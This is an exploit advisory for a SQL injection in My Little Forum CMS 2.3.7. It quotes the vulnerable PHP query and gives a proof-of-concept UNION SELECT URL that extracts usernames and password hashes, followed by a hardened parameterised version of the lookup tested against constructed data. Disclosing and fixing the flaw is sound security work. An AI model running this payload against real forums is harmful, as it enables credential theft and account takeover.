My Little Forum CMS 2.3.7 SQL Injection

2017.01.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################
# Exploit Title: My Little Forum CMS 2.3.7 SQL Injection
# Google Dork: Get Your Own!
# Exploit Author: Black Termites Security Group
# Vendor Homepage: http://mylittleforum.net/
# Discovered by: Sh4dow
# Official Channel: Https://telegram.me/Termites
# We Are: Sh4dow - SOLTAn SILENT - AVI Hacker - M-R3dH4t - Sorena - HashoR
##------------------------------------------------------------------------------------------------------------------------##
# GoogleDork: Get your own!
#
# Vulnerable Code (index.php):
# (--> mysqli_query
#   $user_result = mysqli_query($connid, "SELECT user_name FROM " .
#     $db_settings['userdata_table'] . " WHERE user_id='" . $selected[$x] . "' LIMIT 1");
# <--)
# Tables: (user_type, user_name, user_real_name,
#   user_pw, user_email, user_hp, user_location, email_contact, last_login,
#   last_logout, user_ip, registered, user_view, fold_threads, signature, profile,
#   auto_login_code, pwf_code, activate_code, entries_read)
#
# PoC: http://Site.com/forum/index.php?id=-999' UNION SELECT 0,0,user_name,
#   user_pw,0,0,0,0,0,0,0 FROM forum_userdata where user_id=1 /*
#
# <*Iranian Underground Researchers /*>
################################################################################
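The lookup quoted under "Vulnerable Code" concatenates `$selected[$x]` into the query text. The following is an added example of a hardened form of that lookup, not code from My Little Forum or from the advisory's authors. It assumes PDO with an in-memory SQLite database as a stand-in for the forum's MySQL connection; the function name `lookup_user_name()` and the sample rows are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hardened form of the user_name lookup quoted in the advisory.
// Assumptions: PDO with in-memory SQLite stands in for the forum's MySQL
// database; lookup_user_name() and the sample rows are constructed here.

function lookup_user_name(PDO $db, string $table, string $rawId): ?string
{
    // 1. user_id is numeric: reject anything that is not a positive integer
    //    before it gets near the SQL layer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Identifiers cannot be bound as parameters, so the configured table
    //    name is checked against a strict pattern instead.
    if (preg_match('/^[A-Za-z0-9_]+$/', $table) !== 1) {
        throw new InvalidArgumentException('unexpected table name');
    }
    // 3. The value travels as a bound parameter, never as query text.
    $stmt = $db->prepare("SELECT user_name FROM {$table} WHERE user_id = :id LIMIT 1");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : (string) $name;
}

// Constructed sample data (not real forum records).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE forum_userdata (user_id INTEGER PRIMARY KEY, user_name TEXT, user_pw TEXT)');
$db->exec("INSERT INTO forum_userdata VALUES (1, 'admin', 'constructed-hash'), (2, 'alice', 'constructed-hash')");

// Constructed inputs: two legitimate ids and the quote-breaking shape used in the PoC.
$inputs = ['1', '2', "-999' UNION SELECT user_pw FROM forum_userdata /*"];
foreach ($inputs as $raw) {
    $name = lookup_user_name($db, 'forum_userdata', $raw);
    printf("%-55s => %s\n", $raw, $name ?? '(rejected or not found)');
}
```

With mysqli, the same pattern is `$connid->prepare()` followed by `bind_param('i', $id)`.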

